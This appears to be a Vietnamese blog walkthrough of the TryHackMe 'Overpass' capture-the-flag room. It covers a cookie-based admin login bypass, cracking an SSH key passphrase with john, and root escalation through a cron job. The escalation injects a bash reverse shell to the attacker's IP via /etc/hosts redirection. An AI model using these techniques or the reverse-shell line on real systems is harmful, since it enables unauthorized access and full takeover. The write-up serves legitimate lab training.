Tryhackme - Overpass part 1

Chào mọi người đã quay trở lại với blog, tôi là Đăng và sẽ tiếp tục công việc của mình: giải các challenge của Tryhackme. Và challenge hôm nay có tên Overpass. 

Thông tin sơ bộ về hệ thống:

Hệ thống nhìn có vẻ khá đơn giản, ta sẽ truy cập vào web của nó:

Ở đây ta sẽ thấy có nút Downloads, và mình cứ download về thôi. Ta sẽ tải về hai file: overpass.go và buildscript.sh. Ta cứ để đó khi cần. Bây giờ nhiệm vụ tiếp theo mình sẽ đi tìm các hidden directory:

Ta sẽ thấy chỉ có 1 số directory là có thể truy cập, trong đó thứ mình thật sự để ý là /admin. Và ta thử truy cập vào nó:

Hmmmmmm một trường đăng nhập, nhưng cũng chưa phải thứ đáng để tâm, bây giờ mính sẽ bấm Ctrl U để xem source code của nó. Ta dễ dàng thấy có 1 file tên login.js, và các bạn sẽ thấy dòng ở gần cuối là set cookie:

Trong trường hợp này mình sẽ thêm một cookie tên SessionToken với giá trị là status0rCookie, và đây là kết quả:

Ồ. key ssh. Thế là mình có thể dễ dàng đăng nhập được vào ssh mà không cần phải có password, bây giờ ta cần làm 1 số việc như sau:

• Copy đoạn mã này vào một file nào đó (trong trường hợp này mình lưu vào ssh-key.txt)
• Sử dụng ssh2john để dò passphrase của file, ta lưu vào một file mới (mình lưu vào ssh-john.txt)
• Sử dụng john + rockyou.txt để crack passphrase => truy cập được vào ssh (đừng quên chmod 600 cho file ssh-key.txt)

Game là dễ. Ta có thể đọc được ngay file user.txt:

Ta có thể thấy trong thư mục /home/james có 1 file tên todo.txt, mình liền mở ra đọc xem có thu được thêm manh mối gì không:

Ngồi đọc một lúc thì mình để ý đến chi tiết: "automated build script working". Mà trong Linux ta có file /etc/crontab, đây là file mà giúp chúng ta có thể lên lịch trình cho một hành động nào đó một cách tự động với thời gian được chỉ định, ví dụ nếu như ta muốn cứ 15 phút thì backup dữ liệu 1 lần thì file crontab này sẽ giúp chúng ta thực hiện điều đó. Và bây giờ mình kiểm tra thử xem file này có gì đáng chú ý hay không:

Úi chà, một sự thú vị không hề nhẹ. Ta có thể thấy là file etc/crontab sẽ thực hiện công việc chạy file buildscript.sh dưới quyền root, vậy tức là ta hoàn toàn có thể leo thang bằng file này. Và các bạn hãy nhớ trước đó mình đã tải file này về máy, và bây giờ nhiệm vụ của chúng ta cần làm là:

• Tạo một directory mới tương tự như ở trong crontab trên máy của mình: mkdir -p /downloads/src
• Ta add thêm một số thứ cần thiết để leo thang đặc quyền vào file buildscript.sh: "#!/bin/bash ; bash -i >& /dev/tcp/<your-ip>/4444 0>&1" và copy file này sang đường dẫn ta vừa tạo.
• Sửa file /etc/hosts (việc sửa file này có mục đích chuyển hướng kết nối, thay vì kết nối đến localhost thì ta sẽ kết nối thẳng đến máy tấn công của chúng ta):

• Khởi tạo http.server ở port 80: sudo python3 -m http.server 80  + tạo cổng nghe ở port 4444 

Và đây là kết quả:

It's ROOT TIME!!!!!!!! Một cách leo thang đặc quyền khá là hay, đọc file root.txt thôi:

Cảm ơn mọi người đã xem bài viết. Chúc mọi người có 1 buổi tối vui vẻ, bye bye!!!!!!!!!